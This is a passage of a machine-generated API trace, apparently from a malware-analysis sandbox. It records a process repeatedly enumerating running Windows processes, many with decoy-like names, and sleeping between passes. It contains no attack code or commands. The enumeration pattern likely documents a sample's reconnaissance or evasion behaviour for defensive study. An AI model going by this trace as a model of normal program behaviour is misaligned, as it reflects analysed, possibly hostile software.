cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0118.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0118.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0118.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0118.981] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0118.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0118.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0118.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0118.985] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0118.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0118.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0118.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0118.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0118.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0118.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0118.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0118.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0118.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0118.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.003] CloseHandle (hObject=0xc4) returned 1 [0119.003] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.008] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0119.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0119.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.041] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0119.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0119.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0119.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0119.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0119.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0119.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0119.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0119.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0119.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0119.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0119.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0119.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0119.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0119.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0119.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0119.073] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0119.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0119.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0119.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0119.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0119.086] CloseHandle (hObject=0xbc) returned 1 [0119.086] Sleep (dwMilliseconds=0x12c) [0119.484] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0119.491] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0119.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.500] Process32NextW (in: 